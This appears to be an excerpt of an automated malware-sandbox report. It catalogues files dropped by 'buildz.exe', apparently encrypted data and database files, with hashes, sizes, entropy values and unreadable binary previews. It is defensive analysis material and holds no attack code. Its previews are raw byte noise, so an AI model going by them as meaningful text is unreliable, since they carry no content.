                        SHA-512:FD63A263C0A6DAB84DA5DA0832269F058C2666CD9CBED9FE0116503663FFFD4D65A810336A6BF0E059F809974A0BA7590D3CF7CB48E1BBC767765C146E15CF83
                        Malicious:false
                        Preview:SQLit....+N...}.;.5...x....`..ls.Oy.#.R.)Z^...q^.2.z..PT.S_..e?.z.....5..d}h....\.yV.HzDL.tRu..Tnf.9$Co.......6...B...Px..........7.....!,W.Y)C......$ACWcJ.!..Xx...s.A.KYCo1..J......{.%...x.5x..Q..[&m@.d..d.G;.U..H.2XV...$2V...y...T..ph/.:.Q&.C@{...'.u.g(c...<#W8.....P....T....SM..f%.O...}.jOaF....7!.~`,0...........^d..]s."..}.....!.M.......C...._F..v..S..bJ...4.$&2]Sq....y....'V...._..Q!$p...Xw.......H..-..#.&V..%T.u.$''.&...m..eC`..e...^....k.....SOP...,#;...zf..nx.,3..3X~L........,.0....>.AZ3.H......M.|...X...j..?.G......Fra.&R....#..L....|.qv.%3.(..!5...)..G...1..>..z.:0Y0..C......BA.b...../..[.!..pG..G. ....>O...I..........6:..n...T..W..;...T`.....r.\..V..=g....... ...M{D...;4_..^9^M...=pb.0X.d/....!8lgG...T.N..4.o...C...Ha.n<.+._..x.K w..7..t..>..OW..+.9.z...<.2.....9v..D.Ey.....1wA...~S..s.8i.}.....f.....y../.&..L...N.....D:/k.O.ibR.M.|.5......q...Y..-.=&@..%......'...t.7..0&F.....5V....?-9...UI.<..`......xh>.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):3.4252091749965876
                        Encrypted:false
                        SSDEEP:384:3IAh8gmF9zZWkpOzv6ZfrDiYVp9mv3jGYhOBh1OY9qkYTCA/0U3KGupqoNf/:XjAzZWIHj+Qp9ijG0OBrpqVTVs2u7f/
                        MD5:4538192E8F3E0E3DDBA4D3A29AC68950
                        SHA1:5C936FF29D8E94BA5A58F0A5F015AED21EB0D2AB
                        SHA-256:2BA14345A276C352807A992D2313FF1AA23AAA21F125A2A79FAB31737B0D4282
                        SHA-512:5F55CB9BB2075D223AB176494A281360579E5DE78AECBFC575051C69473208CB2CF2C42BB33093D3349E400CB0B7E7EBD543D35075BD672E79550662F96A628C
                        Malicious:false
                        Preview:SQLit;.5Q.}...k.....}....o.......rx.....;.7;......ad..a.'..yawm.0.1.qc>......$.omz..........5...~n5.......;..=..........'..@.!X........c./......@s.b...dc.1U.6....._.Q.....%.zC.Q..K....y..B..R$..j.U,......F.16bS_...S..(.R......ul..r..VV......s..({.P.....q.,..F'.....\..3#.[M.J:P.f0.,...D%.C..->.R...UT..?+lL.6.J;e.ys.l...x..NS...E._.....^..^.........!...sbB....-.NG..S2o...]aGg......4A..+.Bc.2..S....c<..D .S..F%.r5..1.R.~....%..6b.gi.}.g..E.m....#.;..).|..~o.r...]5L{.X.ZAr5.......y...j.v..q......k..6r-T..n.......5..C.w...<h..Ai4:b...x..L......vN..[qZJ...:...S....[.........(...S...N..G.c.v...j..._?Dm....b......#.k..^a,.-.......)Q.D.8..Ar]........{....E/...p..........9.,+Hh..Z#..xd.....p../...../a..T.{.9.q...!.......Vz......._...4...T}......q..9CK..k.{..1..^C...k..%.2..n..p2.....;A.....]H2...eG.2.......:;}.m.XlvK....a....8.Sl.......(.|{p..7.J.L.....TntRydM...... p(...M...3.Y.)....Qi...kY.........Y...p..K.u.s*.......*.V..bx.n...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):3.428121898114396
                        Encrypted:false
                        SSDEEP:384:M8U+mdpWFJWuaGKDsFeC5Y/ox6DshqXSlyv+W1v3XgJDipxEU5tZj/:MgKWbay0C5Y/BzXSW1vAJ24U3Zj/
                        MD5:1A14B2229C6D8703A134FF6C5083FDF9
                        SHA1:2248EA46CD5530EEE7F5B9FC8985EC0174F22FBD
                        SHA-256:18730A0247216189B584FFA9CF26E89D7B936E0568747466031A376090F19E15
                        SHA-512:4D9C4A7048D8928881C6A3FD938C54DD18E41ACC0A96E1E67874D6C87A9366E7F0D3D64DADD615D4D2876739A992D8B7FC859841DBC716F83A3A2C8C023E63AA
                        Malicious:false
                        Preview:SQLit.@.L../...]*.C.....D.....p...X|..[B.y*...O...8....|,U`g.E....<..P...?.4L......No..r....-.....]x..XX....B.m..t.....s.........xa.e"... X.2....H#..?......v......R.xJ.R.k+.+.a.M...^'......F%l. .f...9.v6...`...E.....&..*.q..`..iU..`.,...3.L. =..Ff....lbx...7.uk..5y..5..IV..Z..&".t.=.r.....>..S......,,.m6...d..A.L...t..W.k.&.V.F.y.].....q..s.T....7a.&?k-...1[H.V..h....W.>...R..J.#h&...=...<<..`...._nc....g...\.i.M...Dv.q9..m.dz.%,..H...R....._.....'....5..#.-.:..e..AU..j....9.NU......$..;1gn;.!...`..mg4J..z+G.F.a..A..L7........Zh...{t.D|.8p.4R.T0_.<4....*....w.[...r'CU.+_.......<.y..pZ.6j..5.-....N7..6..]y7..l..<.k.....}1.t....b./g).{...K>j..........O.b......V...{`ptj?...2......B..z.}./#O&@......6B........<..g.....I`J].d..'.*iZI..Q..$;@...|...x._.d..Uw.J.'.&O.$%mq0..Zs...N....F.X..b..#|;>y......D^q*.zg.7.._0.......h&C.m.h*G.$.......8uq`..<..".......}Hs+i.T.*.b4. ......O.[z..fAFA.-..*..M....V.H..5.c.`...eV.(X.........v.Bz......MT.s!...|
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.926866187309733
                        Encrypted:false
                        SSDEEP:48:SoTDND8Wng5Ifo1VaprW8S9nnKGxVdoxbA/oMNdZtCd/9R9mxDsd4btUD:RD2t5+iaprWJ3zd4kNNvsf4xK4btA
                        MD5:EEBA986C951545BC853B342D568E6F41
                        SHA1:685C0E90DF0C0F33D2BDCD2D2F896F679CFA179F
                        SHA-256:C06C995FDD48377E3EDC1197565EF2F753C63D1FBA5588B553718464AC1A5DFC
                        SHA-512:B582F5F0183494C71B85BD0C24986716533BAD9D6DAAADF9E4538C23734B7FFF792FFC92EA62994B1601E51CE09E97BD9C198A79C2353BF43D5D8D51E37DFADD
                        Malicious:false
                        Preview:{.".T...5..T.x..t.D'f..l......<.....g..l..A..B.US.4..S..u......U]@qK.n.+....C.%.u..0g.w.W...3.:`,%..........]p..........2.."&).3Z.H,...g..3.....\#.).....:.tT.}1.5M..?.n..H# ...&....T....m.M.467.y......T.Wi.6.!.......V..`......>.{.djy.v...7..."........2.c........v.cq...../.........?zba.(.zB.@..Go..n.[p..R..w..2....S.....t..j=#5i.;KF.R..z>".x...y.....L../..R....z/Pj.f?........t......P.he.':.NG?J.z.$S..l............T.tS'...AjT..56<..e..U[..."...z..g..4M..?.u_.....5(....L..~.d.....(...5...TC.%......z..].R....z).X....c.........u....X....|tLG.f.Z.x...........}..0.aY.:N....+.F}.'..r.01..T.].iC.l ...(..&f|U......E...J....B\..M..*ynK.*$5Sc.T.+..>N....(.Gv....W@'.i#.o....[.c.=6N......[*m.BK....F.)x...*t..0..As..m@.ePe.j..l.B...Z*M.B.?...ofp.4....<.....d!.3A..z.,.h5...%...K.O..UI..?..wso..."..tc.;m.n9...i.t....1...l...;...^..(...?U.`-..........f..0.%OxR.,.I...nL<..t..Q.1...#z..W.........Q...<.g.d...tC...U.s.v....nw..C.8......N.Z........u.O...@..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.932242699124162
                        Encrypted:false
                        SSDEEP:48:tXlodjCPED39PWNuXQgw4LYQXugBn8ECNSlywR1GplgMGOwkqMslUD:tXad8EjtWIAgw4LYIuIn89gAwn+lgMGw
                        MD5:6E32F0A8F3EDD320961FFAC8013853E0
                        SHA1:8617E371F82961C444E1E3B3E23EF71BB182A42E
                        SHA-256:D82ECED86BBAB2194F15A610C0DC8F09F0DDB4C262F22339CD66EF4EEA22B0BB
                        SHA-512:394C28A9DAEFB21122EA7DC4F2AF05F67CBBEFA243F74A49E105BC89767FF7EA62E107D665DB9B3071EA9FDA575B5F5F7C6D6C9C12C4E4EBD33FC29A1AC9759F
                        Malicious:false
                        Preview:{.".T..d-i..u....W.k...9....L=........>.l.}H.j...x....~...v......?0;YhsLZ ..+C.A.k_....c.'u~7uMp..dR.....[.tr..=.b...zJQ..o.;W.{.8}..n......1...f../....}...0,D.O+n....{.z`.....PIN..s|xi..,....Q.y....t..5.....?.41....<........p..cz..@=v....?&...nD..k..1..#qo6.].....:rj.2....Q./.u9fR..5.>H.LWc...cG2(..Y.Y.E....0..m..>..>i.3.#yw..R...vP.....1..+&^.z...V.....!Cd(....T[9..CX..G....]..>.l...L.O.gR.,!....vV...dB..*....)Z.C......SJ.?u.uu....>.*....=..9..;y9".......?$.v....J....{...ON[.........q.[..84.{6........wm[AF.P.^0.yz......Ek....>.m.V:......R.n.-.. ...8*.L...C.2..B..'.I......../..`...guZ..^c..a....S.E.. .P.MSl......c1....|..D..cQ.?...S1("Y..j"...}.I...x.9...5\...2..(7.Wk.....n.....vU.N..U....g.8r...mee.F2z.%:w].*...m...dQ....v...k..lrmn..).P.w;..y..;.....Q..3.W...Tq_..o....c.........Q...;...P.......\..w.;K.#.Ql@.K(/...F..md.....oU0Nc;2.PM.U......<......:...6:.........qz(..`.ZV.....z.`..B....OI.../.b....t.i..q.N...q......K..y.J.f.R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3018
                        Entropy (8bit):7.930906451943714
                        Encrypted:false
                        SSDEEP:48:0RVZWa2inrqVHSxL/Q15RpWYIbWWmWMapvKp18W9jP2qFBofSk/AvbML/NYpIUY6:0RVMa2inKSJ4pQnmG0KujdFiL/UbMheb
                        MD5:FBB15139603CA87903CE3960A9649A69
                        SHA1:87E4F26C8036B46E2A487840F9B068743775400C
                        SHA-256:1184F20423F1B62718B602E615F038D765CA184D58A21C548431CAA565A80105
                        SHA-512:4C19C0CAE22C1C57F3A2E9E3963AD69648D51ED194220C68B2C2D15F8E3D503D82A11A27CF7F8AD046780271C4C41229CD93E504DBA2ED191B5DEC57F5888867
                        Malicious:false
                        Preview:{.".Tk.........P..4.%..G...+.h.[....=.8.]....[j...i.}t...}.6_..\.7q.....q...O\s..h.!RDa.~D......./...>!E^$..%:.Y"f#<..).A.....h..2G....mS.j&>....KH...|OO.sW.....9+{[&.0,8...sg.......k//._..!A.J...#.w.V...QqOM..Qj...U...M..$.....Q}2..?.S..'V...Q..@BJ.D...U.\Q..1#...n..4...WiaV.O.Ua...uT.B.N~\B=H.,.4%..zOed.....`AiwGc...>...&,*..r.N"..Q<.S..P.8m.....YD..ORU.!6...$...b.v.^....;.8..3V,OR...U...X....A.T.....kA.{x...4...lY...j9QL..k`.....{EX....qt. l..-..s...S.B0.;Qyj.ru.Q.H? M..M..C'..3.Y.N..L.r.......N...........Y.-..3...6...~............4.2.~phF8.EA./...U...\.`...H._t.v...s.HZJN. ...3}R...U...5...3.....`B...c..'71....p..k......M.16z......Kh0.....V..9.u.e.]...........&~..}.F'.D...g(.l...{.'N..j.|..../;........$.7.X)..&..?p.`I........N....ex/.$.....<.kN....F~.P=.v....J..*J(.m.A;..<c.......x^.&......:5........J.D.g......W...9\4;.\.]?.tT(.y$.3gl;...*.....Vq..1...$.t..u.G.]w....[}...qJ..!A...`.?..M.....+G]N....;.Nb.....T....t..XO..2....e.W.dJ;.M.....jq.9R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.926178927211946
                        Encrypted:false
                        SSDEEP:48:Gsj5p0T7/C4/RmknMZn4AQSOvNc0+YzGbk+YozZPOmc+EyX1Smb3vCiir0iUD:GfT7/C002Lq0+YzGQ+NzZPO5+ERMC1bA
                        MD5:DA0AB699AC147E7FFBF230F51F581AE5
                        SHA1:4102E7328249753F2B14F013B94378794919D701
                        SHA-256:7F1D3BB8804BB48C4B10C7B39ECA3B9C6253F9D193EE17352247DBA338EEF4F0
                        SHA-512:BF19BC1432737208B1C637D6F72B688B25073E8ED95F78661A1CB199B755758469CD453123648E7F5571A90DB8E0ECC8292037D3B5A7533DC3F5BC4920765057
                        Malicious:false
                        Preview:{.".Tr7/y............*.d..z:.J..m"..<D..f.b.U6'o.?Z..V2^.L...U...#.I...+...K^*...9.......P/M.d.R...`!>{.6..Z.4.>|.-*..7..p....>%C....C....=...#.q.........:.."y@...}..,...s.Z!.q.|...w .%.3.5.d....p.Hy.}ra[|.......M..G.....SdZ..l.SU......../Y...^.$... .R^=`.!5..g..i.$...]S.M..w[l.F.b.....M..s.s<.@og.ZU..\1V...*8N7R..n..N>......a....PC.'.MW..i .3;....+.~.X......7.E....t.x.......1.........|I.<,.M..H.....$./...'..k.Ox...w...<{.!.....R.....c`..G......pk...,.....D..t.XC...j.).}..u..Ad.-_E....j.W......$/p..-...=yV.B.d.f....(1Jt.j>./.L..3..Ki...b.N..t...y..fz...9.U..n..x*!.*.....9.. .. @T.Z.`..nPu*.....D...M6..hD.s.z.Em...F..[.IK.e\...1..!j.......iU..W.+L2.$^%.m`h .....`........AiHXb..."..m...rB.9...S..m....^.x...P<cq..u..S.o..}....3..(.G;~Ocv....kE}....0...o...@...I.U.{.6|.MB.Go|...R....[..1....>.6.-C.(.S....i[.,.H`.,u....W.8...7@CIFNA.cz...-..FB+el..9....FG.z..(.Q..9..J..|b......^.U..............y....>.[d.Bo%FU@e.Dx.....%#<K....{...u..3.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4956
                        Entropy (8bit):7.954876434216311
                        Encrypted:false
                        SSDEEP:96:9L1rAG0EswTYjum9XDJxcrWx4CpXo7f058cmciqnJYuP4d2FveC3edtwVAA:9LGGJswTYjum9XDJxc64CpRCTDqnJDV/
                        MD5:2E224D7D722D01148CD2336061C65FFC
                        SHA1:A928E06776CF04C466634B2A24D876B06A223ECB
                        SHA-256:7C94C9A353611C7F8D6553DF5BF09E908C04971512847A451BF968DFA48A93D5
                        SHA-512:11403F5902821F7A1B21B1423A6161848EAC300D6717AA2DA20254F0C924ED427D13187BCFA90EC45F82FEB51C02EA3ECD217F16427ECED3CCDAA43B56A96680
                        Malicious:false
                        Preview:{.".TXT...2".$K.2&..^.....ho.[%...,KWb1.G.$...y1@sa..zO....)....]P.".@.~..Y.1...u..nR.;.zw...S........4d]....,..B.~5L..1.....X#...3...2..&O...;....8....i..&...;&w..;.(z.=" ....y.e.E.^.:q..H`7.RX.)...._2..0..9.aWY@..DZ....N.gYy...dF..q.WBD.....w...........$Q.Z.Y.b..(....HWN....Qc.G..s!(#..L.6..:.wv.D.X.i...~~!..x....Ob..8m.7..Ln...00...d....+."#5.?q....7h.l..3..=.........A....*g.:..F#F.i....1.,...;P.. ]..{..u(\\.].(.L . .,I-.3>9.c..p2...+`w."]....r...g.m.1.t...b8...N.:..m(.j~..Y..c.)(....:.=....gS.n."+.....,3siW..e..F..#........y..30..M..H} .x/......N..]...$.[.M.....y2/..........)&.k.e6..-.N!t..!...m8......K..........i....[......p...D*.]_....m.6.L..FU.4...^U.3...h..X.\....>%.'Fc...5|...R_......[....}...(.)4...j.t..4.l.?.p.v?.....m.Z.D.l...X......p....Xqr_}.3^4.p.x....S~P,...q.}]..F..zj.CE..>}w_..z....F8...;Z.\w.S...b".../.....bv.0/....$.[....j...R+..i..../Z...lp.......".WV5...`=.4.k*{(......0..f.>mA..S.Q.....)!t...j1..^..<.?}..nP.I
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3018
                        Entropy (8bit):7.938715952469897
                        Encrypted:false
                        SSDEEP:48:vfPecw+1259xSBwZjEk3rYW9Fz7Iq2COQx3w1XHaXsVWxc6EWbLE//IT0KTwTXB5:PehfnIBwtHXMq2C/32QskykE//hKwmA
                        MD5:F6A5F29F9A2B5AA473E14422D792C552
                        SHA1:2804A1C3B5E86AB35B29D3E7D30086E4C35AD2CC
                        SHA-256:A9C356EE3C1480C9E92989CD033651CA08CC4A26806A7616E3278AD58B7AB2CE
                        SHA-512:689A2E46F3B0CF9CB364AEAC43791A4501855D40311CE2BE82C02A3402F56F490FC49E26923041AC0CAF8311BDE33C7780BF1035EE7BA160EC137F7C9F191787
                        Malicious:false
                        Preview:{.".Tbpe.y...V@..CX..<.8.h.h>..I../X.1.CX..B..$.\....Y..w..?.up.....1m~.ZPM.v....i8/......+..oc!...Z.6r.....[..}...u.....q.2._..i+..n5.v~...X.2.n..0b....;lQ..6b...d.>...I.3^n%..0'@..6.Rn.y.....o.\.ls..w..,....y.8=...Z..x.P...0.)(.j.b..e...c...X..i...:.w....|.:...8{.C.s.e.).<'0.._w."k..H;U.v...U.tG.....b.T]..\....f.....l........tV'..D.r|...|@T<fy.U.."Y...`(Py.!..Z.&....A.H..E......K..N.........<..e.|T.......85%Q\......](..0.'g...okm@.....|ZQ.<ON...C.......!.]....v..}..4..T......o..^.X.=....@.:.1E.'.....o1&/..a.~aF.eu.8h...t(.D....?.....x....{.@.q.r._....^....A(..3o............u...`V...P.....?.2... z. .....4D,..s.X{..*.:.d.u.Z.b..J..i+*Kk.......P....Zz..g....P6.I[.....B....B.|]-..sv.]...`...U.q5l....-A.4..5c&.h.-....1IR!.{f...j\=t...{}.C.M/.....K........[P...1........],......jv..'.>..*.s...8..J."8.N..k.42......B=.#.R...X.&e....Wu(r...,..J. ..(B*..B.....Qo..e-.A...(rV.?(......W...W.O.E........X......n.+...&.F.i.n..nf...V....# Q.^.[
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.922987819076168
                        Encrypted:false
                        SSDEEP:48:kltx5mkX1DLXx+19xS9ir8xPiGtgJRoA1txYnLdkr4/VdfwKBpeiF16qab8lOiBE:SjJX155cAE0gJRoANYLdrf1IiF16qa4m
                        MD5:DDA98E6F9573BF25FE44F90779DAADE9
                        SHA1:B20B69114CAB47452DD98488F91D62CF0508C129
                        SHA-256:7D10918C03DB6A67E937552DA4D458060C30B1F90E322E132CCF5AB98DA57F0D
                        SHA-512:A3D258E4661DA37BA8668CDDAB0FB6CE5154B6A78FC95BD06651DC5CC60EB27148D5051B49630198A5E2EA4F64393E11127A18364F955BFD24F55F6FA4B9CAF7
                        Malicious:false
                        Preview:{.".T.?.Pc.g._.9i..B_.^.N'._]'^..%.(....P.P8....T\.Y.3.q.3H.Y.Jz.Yl>....K.W&q.T.n..OI.(Z].Owp.~#c..].W"...|.}.m....W.qN\....b5.....r....5....v.....T.~g...j.1.'._..TP.44..p.a.........V....~..R;..].1....U.*.r7A..U........a.p.m_.........~....F..=..S`.@...n....C..v2.{...............4..~..)bX..P._......lXe.h.....<.4]3..Z.<7...:.{c.t$l...>y.|.*nO.)..^.wb....k.}_.]..Y.....Zh.. ....a"M.`...i{r.#m}.PQ =g0.J.g.6r.......;.1L.B../r.#..1.7/>...0..;.D...T..A.k..;Ld.D....h..%N6.jG..!..Q......h.v..X....4./3.&R".Jb....DJ.uE(.Xy.3......&..*..gN........G.)....3f...../-.t......`C..H...ZY~.,-..xs.w...IS.KG..J...Ej...T.|5..[.].../..8........T.9...N......dA0...8?".i<......}>.4..U..R....t..^..d7.k..6...?.t.'.T.I....%G{1.,.C..Q...Jw.3...W..f..g.F.S..I.....B.u..M..q.C..|o.....d.r.uMIP.{..1[..S1..1..[..u.a.D......l...j];.`....x.\8"g}..j-|'..g....|'@o3...0,Toy.%.....\[.6....Fj...+...|NB%.Q.{.&d.h......"..B..~....hM#...s@A..l.8.`).O+.....4N.Hb>N;.~O=.xX!K.n.t.m......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):770
                        Entropy (8bit):7.733298250109843
                        Encrypted:false
                        SSDEEP:12:T15+ALrO2idd6SCV8fU7hj2GbaIxLkMkNJaJuIU9o5uxqDemQtpX6XI26Gcii9a:jL62iD6lKfC6HIxQRaJuP96De7pNGbD
                        MD5:C727E00ECEA0D87380723FF7F9201033
                        SHA1:F2CCE952FE8DC0A5599014B00721D1B5E0CE88C2
                        SHA-256:1472E189165CC129C3C75D902100BE6B3BD4F6D5D47B834B52D90D47D0A2A764
                        SHA-512:F0CEF4E6888870D4D09843A3CB5E9E22F8727892262C0D7ABA32C0A8EA56FBC01044935B283E2BDF6ACC10088D6F2D2F5B0F3F12F5249426F31B6299918622DF
                        Malicious:false
                        Preview:....B#2/.2.2D........A\.F..l..K.".......K......z.?.*C.3..zUm0....$.qz..x.[.C..s....%x..._...1..2..uZva.7.8..!...s@y..8u...Q....{S.......S..CJ.>...6K..........<.k...wJ.>~..Z...F.a=.._..4"Q.v3..V..F.s......$......w......'.M...:Ocs.........U...U+[.~.)..B.. ..U..oo.....$.T~...}..F....i.t...y.*...j_*.@uc.f5C..}JQ...3...-.......k.........}...w...u`y.x.1...{l....:>:..?.T.........N.Z..{.,x....E..../**@W,K..W%X....4..M.K..i=R.%.U.....v.R...,.}...O.:.I....t(...T...y.X5...W8.b..zwY.[K}....X..*.....;..N......Z...T....j..?1......2....P....\....;....C.r5K.'..].........[.#]lr...._....c..:^.7,........5.{.x.....?Kw.'.<....gX.I..46..z.X.G.Hs.G.x..{..Y...+.[EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):424152
                        Entropy (8bit):6.332608235689067
                        Encrypted:false
                        SSDEEP:6144:AkMLApuqk5CqTTj99wdm+vyJfbnQkK96B88yKv4bWTmTvEiLS8:AkMLmutFb96dm+6dF4/b
                        MD5:D64017BF9F3E6178BA6AC09EE2F124B4
                        SHA1:AE9EFBB2733BD4EA2552DD544BD2801DD780F3DD
                        SHA-256:BD3D59395359C00C110330B414DFE1990E79A5F99C33808FB2D3E3DBA27C7032
                        SHA-512:7CF89E43C74E0B9C91F4997AED634FD32329CA24156C1921C95752BF60C14DB04A917EEC67D4DE3774489BBF339E7E8B495F83F8CD0C6659C099CDA1DCB25D24
                        Malicious:false
                        Preview:...P..>.Z....]..s*..........f6........7..bp....@..i/N...P}.[..J."1ECC.~`?m.Gi.>../....,.cq.0>.............=.5..?.....1.)..(.......O.....l...P..........C.%.......E.7..........D..-].!s..QC..v.b..p..7.b..$.Q.>/..Q.... .UB.y..,.e..3....'!n...t.B.|...n.d...f.*.....P3..:p.....R...<.P!.....R.Z.)........f.`..........F>^...1.ue'Z...O...:u&.....3.5.......w.d... v#^a....==....UBQ<9.d.7..a..r.J..jc...z...s..u..^.L..&.x...j?......s.G.o._.,.*.K....JG.G".;<...{..W5M`....a...s...hg...H.z.}e:..r........l.F.2'.../=.Xa.*....}.......<...Q,..m[x"....(q4...-...%...t.3k.x.....7.........{...MO.....[z....u....&.:t:...2...B.a.7......8RO.....;.D.ZM.3,l..M6$q.hec..-......g..EzS.2...#...A......k..&...HW..._u5v.8.>.P..Z0......Q.....l.jqH..Q......P......5."....v..e.E.4CI.]M).\}.y.}$.a...........N........-3t.6.;.srmk.S....2\.7T..+.r..)3....V........FiN.c........Np;...t....`..\...CF.w2f.7B]..d..Q.....)V%......,|5.a....y<........I..?...EM.g[T...e,.,..*Z...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.989616320775836
                        Encrypted:false
                        SSDEEP:384:l6VW/2QQZQV1bLWNGuWVcgSBZEZS9hFrWGc0rfEm82tA:kMQibLXRV4ZEw9/5tA
                        MD5:B05C5A6B3A742570F76D1F0A95A04A74
                        SHA1:E8FFE37F21D4F8FA65E6A86B58728EF0D7906EEA
                        SHA-256:DB6A97328D3F1F81F3ADA40B0121B0C0F34BA8554EFCC3644A2B41B33AEE5E66
                        SHA-512:F764A84F57127558D60A5FA3BEC13A864534B12D9BC56F52672923417C1D203BADDC56555263FAE4276F184DF76BFDAA08111346552BF500293FBECA6EDB0F34
                        Malicious:false
                        Preview:.... ..Y...c..Xy..q-.})(.(.{e.....oR..I..K?.$iK.j.F&8.R+s.C.a..)..J.J d.(A.3.k%.V.CWqF.Hq......./..a..I.6..,4.w..W..}.9.39.9.......i.....{.6.....R..6._..2.>}.?.=...~.-..8.e.2.e...Wu..X}/.P..}....i..w...Q9.a:..u.^..e........~.q.........$..$.>p..Nq..x.TF....KG...J#.H.X.a..q ..J..... .t.+....|F.y.K...$|.%.}.5\Lf.Y.m......gWR.e..[Vn\PT{....@.....3..).9.pP]5.&.X...@&.w...h...U$.\.|..{...})68..Z.t....X(.....ND...W.../z.g.#K..Y. ..8~....1.....t.o........2.#8.e.m_.,r...R....OB3....1j.t*9....Z)q9.k....*.V....9..Py.c..X.k.O....R.m....B......s-l.....{..]....HP~..~....0.}...3..@..0[m....J...y"3...3.w........\._1.ro....b..Z9.n..g.....?S...B{0"V....R...........aZ.XM.`'..U..H.o-.Q..Y..qr..9P..~:t..FM.........R.U..i....b....i.^..\...G.^.....A..%....t.H8...%..fmGNL....x.,..)..g...._W..=..I.S4.h/.#.L.5...=.......=.....~R....a.+\hp....jb48..~....Q..-H! ...J.[.go.ZC.3.b4.].Y+...XX.N....w..o.mc..YC......N.@..t|...C.2. ..;N.,..R..c..K...........m.W.....b.7..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.989156185454213
                        Encrypted:false
                        SSDEEP:384:kp2+AqUH7erhOdKY0ZHuGI8bgYWRfw7t5l8F5VuyEnMq1QvmtdO+Q1NSnRA:kpAqUbu7YGIvYXtk5McsnRA
                        MD5:9FA17078460D770EBB6B235A0DFC7980
                        SHA1:B80A4FEBAB6DFCE333568E990AC8F49DB3D91507
                        SHA-256:A2BC689283C248E2529E31FD02D8ABCB1615615B75C9D2C0E7A6B85905138B3F
                        SHA-512:8D9449909FC6A3E9A1FA54C6FD8C713F60621EF78DA72CAC330BB51F305D40638AC0E8F92ED9DF8F4A21EC78F14230549C943583A01694587AFD9F932C815667
                        Malicious:false
                        Preview:....`.\....g...aE3l.w.p.....k.N...k........bt..K.......QF...Ns.L...r.U.Q......-$......:..T.d...aF...:?d...3u./.LE\..%.t..-.27..Tx.K._..[.t.....|t...*.s...EIu..i..P%..Q..xF...:...&....t.aS.sr:.....Z[0..4.s..v..&`....&u,.d..-D.h.W.:.....U.....^.....Dm....G..l')\...z.,s=...9oh..-....W..Y;.b...Oz..R..)ZMm$$.tX...$..o..G........1(..$.:C.e.s.T.rd...K....s..+4v?Nz...]F.ze....|.....6?..4<..C)z...(e@.....?i%.tt.....:4`;u.mp.r~..V...@..w..........m...Y.t..~..6......0....n .c?.{..c..ehduW._..V.lH..Z..'Z.k;P>..h6..m.........C..Q.e.L&,C.N..U.Z.1}...y...... ._.......@...4.N..^e.{..[........%...:g.{.J.. @].....lg.d....<....].T.!.......c+.....X....X..e...U'..%.S..W..U.Im....\...~.V.sK!Ws..*.U.e.{..S.....X...{nz.6.............Ci.=..\`1......a.._....A.....N......w.W.s.......MT=..r..K...0M.3...YX......bs...J.}(k;e.....E.IB.....\G......C.2.. .IJ.J+..]w3W..s.n.....K....zP.......E.$rd.x..+.8.>Z.M.#.N.y/..~W$9.J.\.t..J..k=..(a._+...S..;A.v..:..GlU....w.....v..+.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):424190
                        Entropy (8bit):6.333169080119171
                        Encrypted:false
                        SSDEEP:6144:Op82tmZ0x17+SWl33+qti1k5T+m+vyJfbnQkK96B88yKv4bWTmTvEiLSW:OW28YoR3u51OT+m+6dF4/F
                        MD5:B7CB17D553371217390F2CA5335C3231
                        SHA1:B859865E8B9F159013D61B9F0CE300A382A980DF
                        SHA-256:EE96D7C4571811CF0EC7626F1AC48114456DCC2A41F1FFB73695B53A3F78E766
                        SHA-512:545F7216045AC342210B9B527BFB11F5E1C07DA5422955A722E5094005CBAA917ED064831387F990CD92D1904688B2F700FF55BC8DDD9F687BD5A28D59ECB7D6
                        Malicious:false
                        Preview:.w.. ..o.......!{...Y.r!.5..........[...\$g]y^.H,&.p5}.u....M6'@.M...+.WZ..1...;........<......).6.S...].X.F.../.....Cu.t...XY..rt.......N....(....I,...oPH..(..W ..!U....{2...{...5.Up....dZ...:.x.Y.i...'...O6.P.OY..,.>..a...N..6...@.0Q..&.h.....I.n..x...P.0.B.gU.Q....ta.la..C....3.P}.K.!%...46..yv".8z.).}.. ~..j~&....-....3J.|...w[Q.T... \...w.V.r...f..K./Y......u.f|..k.T.sq[q..C......'..u....a5~......uF...CV.\.......@.Ql.=...l[..j..g...,.~u......:.\.....0E.y..{.....Y.8@...0......d...L.E.x.Tt8|..o....o..5y[.B.o..v.....9ie.a...r.?...{.j...1...l..@iRq~*3.B._!]YF".....gH...z.'.f.....3"..;6gH........(...Vc..t2..r....$y.....D.....n.5..,+l....X.m.}X.r*...o...ze..k..8.........b.8..i...s......h.&c....Z.H...*.....~.6.qI.F.t.k9.v.v=\..+..|..._D...J..{H^.)..TA.......v.X...../.E./Rour>...Wj.n."tldb..}.VL.rX.S7?....J.pi?.>...Ss)b.L ..g..N.....".s.k..G.J.R:......b\k8.$.S...].Oh..%.A.<.s.t..C.O.$.]......Zm..u.2N...)...b..9.Rx^%...D.Q..."V.tc'......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
